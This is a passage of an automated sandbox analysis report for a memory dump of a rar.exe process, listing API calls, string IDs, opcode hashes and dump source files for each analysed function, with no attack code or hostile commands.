                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                              • Instruction ID: 913352eae891dacc841e64cf9224aa7c05bb6e4ef6d708a498b8bec826e747ca
                                                              • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                              • Instruction Fuzzy Hash: 62318036608B8586DB60CF25EC502AE73A0FBC975AF500139EA8D93B98DF3CD555DB01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID:
                                                              • API String ID: 3398352648-0
                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                              • Instruction ID: 362c3299bd5b9acbbd214fe102ef8c68a8ca82e0433a1f88ef6911673db9483b
                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                              • Instruction Fuzzy Hash: D611303261874A86EB508F22E85056F77A4FBC9F81F545535EA8E83668DF3CE005DB41
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 3116915952-0
                                                              • Opcode ID: b44cecc4538195ef80268b9e7976b6d807d072f57678e8aa8dc27d297b8f3769
                                                              • Instruction ID: 5e2318e3f5767fd96613153c27c1d8b8e6ded39c3d8e0713263553129db015a7
                                                              • Opcode Fuzzy Hash: b44cecc4538195ef80268b9e7976b6d807d072f57678e8aa8dc27d297b8f3769
                                                              • Instruction Fuzzy Hash: E9E16E22A08B8682EE20EF25D8541FE73A5FBC6788F455032DE4E8B796DE3DE505D701
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13AC4
                                                              • CreateFileW.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13B0A
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B13B55
                                                              • CloseHandle.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13B60
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$CloseControlDeviceHandle
                                                              • String ID:
                                                              • API String ID: 998109204-0
                                                              • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                              • Instruction ID: 9d170b929a54d14e17b7bf56aafa0ee060a51709c6db023952e9c8c17b369b43
                                                              • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                              • Instruction Fuzzy Hash: F1318132618B8586EB608F12B84469B77A4FBCA7E4F000235EAAD43BD4DF3CD5559B00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1705453755-0
                                                              • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                              • Instruction ID: cf56cf3ec5a5d34528468f151de9c5193fafd9645f1636558ec8634d62fabb4e
                                                              • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                              • Instruction Fuzzy Hash: C7011B22A2868586EF70DF15E8513AF73A1FB86745F800121E68CC6988EE7CD604EF41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                              • API String ID: 3215553584-2617248754
                                                              • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                              • Instruction ID: 0e61ca03d0b3f629b909870988ee59a84fbb9108bdfb99c97052b39034ddb86d
                                                              • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                              • Instruction Fuzzy Hash: F541A972A09B4989EB04CF65EC417EE37A5EB4A388F00413AEE5C87B95DE38E025D345
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Console$Mode$Handle$Readfflush
                                                              • String ID:
                                                              • API String ID: 1039280553-0
                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                              • Instruction ID: 01aa6c2547c23467954dceb769952a01e2023adecd8f210caab6008caa60b5af
                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                              • Instruction Fuzzy Hash: 32218026B1864B97EF009F26AD4417E6361FBCABA3F140234EE4A57B64DE3CE446D701
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 932687459-0
                                                              • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                              • Instruction ID: e47d122730c5fb61b95e523df646dc80272f3c62c84821ca7ec23d40b625ed39
                                                              • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                              • Instruction Fuzzy Hash: BC81E422A0C68A85FF109F21E9603BF6350FBC6B85F185131DB4D97A99DF3CE445AB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: +$-
                                                              • API String ID: 3215553584-2137968064
                                                              • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                              • Instruction ID: d50bb3b693d35b9e3ed0041767a7bc0ea949fefd833f9ea7182074e93aed41e8
                                                              • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                              • Instruction Fuzzy Hash: DA12E826E0A18B46FF249E15D8442BF3295EF92766FDC8232C699C76C0DF2CE541E706
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                              • Instruction ID: ac8c86bf2aec8f709fae51651ca17d457a0e9166fe9a6b101d1bb309740dbd93
                                                              • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                              • Instruction Fuzzy Hash: D6518AB2B146568BEB54CFB5D8401ED37B0FB49B89B50403ADE0E96B58DF38E545CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                              • Instruction ID: 6e0605a91cd67f373a828e13fc40abac73204d5656f16f4e4c9350ebefea8492
                                                              • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                              • Instruction Fuzzy Hash: 84315962B146568AFB00CFF5D8801BD3770FF49B49B14502AEE0E97A68EF38E895D305
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: exe$rar$rebuilt.$sfx
                                                              • API String ID: 0-13699710
                                                              • Opcode ID: 0b1da9e657f7261bdb3f462eb1dbe221dfbeb346c67af24014c3732231eefe35
                                                              • Instruction ID: 16cd526d464b6dbbf267b04ca49db67c52dbed27eea0df154ba14f21d67cd2ed
                                                              • Opcode Fuzzy Hash: 0b1da9e657f7261bdb3f462eb1dbe221dfbeb346c67af24014c3732231eefe35
                                                              • Instruction Fuzzy Hash: 0D818325E0C68A85EE20EE65DC112FE2392FBC7785F404135D94D8BACADE3DE605E702
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                              • String ID: csm$f
                                                              • API String ID: 3913153233-629598281
                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                              • Instruction ID: e221170113bfe57bb5ed383bcc335faae9d232d70cb8df655556285c31cb5762
                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                              • Instruction Fuzzy Hash: 7361B33AA0964A86EF14DF51E854A7F3791FB86785F149530DE0A87744DF38E841AB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Security$File$DescriptorLength
                                                              • String ID: $ACL
                                                              • API String ID: 2361174398-1852320022
                                                              • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                              • Instruction ID: 8e220389e53fd84f848434f17a4e3bf8d2820241e6cfd0866236367e8cf58aeb
                                                              • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                              • Instruction Fuzzy Hash: 43316061A19A8692EF24DF11ED503EE73A4FBCA785F804035DA8D83696DF3CE605D702
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$swprintf$LocalSystem
                                                              • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                              • API String ID: 1364621626-1794493780
